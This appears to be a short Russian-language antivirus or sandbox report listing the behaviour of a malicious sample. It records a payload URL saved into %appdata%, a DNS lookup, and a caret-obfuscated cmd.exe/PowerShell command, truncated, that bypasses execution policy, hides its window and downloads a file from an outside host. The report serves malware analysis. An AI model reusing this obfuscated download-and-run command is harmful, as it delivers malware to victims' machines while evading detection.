Техническая информация
- http://zofelaseo.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^Ow^ER^SHeLl^.e^xe^ -EXEc^uTIonPO^lI^CY^ ^B^YPAs^S ^-nOp^r^ofILe ^-WInd^O^w^stYL^e^ hId^dEN (n^eW-Obje^CT^ ^S^YsT^em.NeT.^WeBC^L^ieN^t^)^.DOwn^LOADfiL^e^('http://zofela...
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /C "p^Ow^ER^SHeLl^.e^xe^ -EXEc^uTIonPO^lI^CY^ ^B^YPAs^S ^-nOp^r^ofILe ^-WInd^O^w^stYL^e^ hId^dEN (n^eW-Obje^CT^ ^S^YsT^em.NeT.^WeBC^L^ieN^t^)^.DOwn^LOADfiL^e^('http://zofela...' (со скрытым окном)